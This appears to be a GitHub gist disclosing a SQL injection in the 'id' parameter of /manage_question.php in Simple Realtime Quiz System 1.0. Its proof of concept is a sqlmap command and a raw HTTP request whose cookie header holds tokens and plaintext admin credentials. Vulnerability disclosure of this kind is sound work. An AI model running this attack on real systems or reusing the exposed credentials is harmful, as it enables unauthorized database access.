Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save topsky979/d4cb58afc5fb41f647b1021d1364d846 to your computer and use it in GitHub Desktop.
Save topsky979/d4cb58afc5fb41f647b1021d1364d846 to your computer and use it in GitHub Desktop.

[description]

Simple Realtime Quiz System was discovered to contain a SQL Injection vulnerability via the URI /manage_question.php.


[Vulnerability Type]

SQL Injection


[Vendor of Product]

[Affected Product Code Base]

1.0


[Impact Escalation of Privileges]

true


[POC]
sqlmap commands:

sqlmap -r a.txt -p id --batch --banner --flush-session

a.txt

GET /manage_question.php?id=1 HTTP/1.1
Host: 192.168.0.183:11180
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
Cookie: i18next=en; Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImU0ZjJhZWJmLWVkMDEtNGM0OC04YjU4LTI3OTFjMzllMzFmMCJ9.0J-cqM7f9-cNNDe8_Q3CAiWkq4iyNqLDbBUh6mnYfRl1Ygv4HPIp3Ky1cbbpN3_4Zr8lYluJ5-nEunFvF84Xyw; sidebarStatus=0; pro_end=-1; ltd_end=-1; serverType=nginx; order=id%20desc; memSize=32012; sites_path=/www/wwwroot; distribution=ubuntu; force=0; uploadSize=1073741824; rank=a; form_proxy=%5Bobject%20Object%5D; backup_path=/www/backup; _ga=GA1.1.2111016145.1721287966; _ga_J1DQF09WZC=GS1.1.1721287966.1.1.1721292532.0.0.0; weberp_installation=li98qb9dmcjbkupdsthditlpb3; files_sort=name; showRow=2000; Module=AP; PHPSESSIDwebERPteam=hnbgetkfg5o9mdts1ul0tt7a92; name_reverse=True; copyFileName=null; is_admin=false; username=admin; userpwd=admin123456; ispwd=1; pnull=1; p-1=nullnot_load; softType=0; load_type=0; p0=1; load_page=1; load_search=apache; SESSIONID=84fddaa1-6f23-4ebf-b2d5-d69ffb8f4ca3.si0YTPb5ZULv7CJZ8PxxFgocWgs; request_token=ro0mHsPqA65198aPlmVMBVmI2GD6ltWERhyREaJpOKy9NuaC; cutFileName=null; layers=3; PHPSESSID=4leijpgfqat2131sgort7g61mt; BatchPaste=2; BatchSelected=null; Path=/www/wwwroot/111.com; vcodesum=4
Connection: keep-alive


图片
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment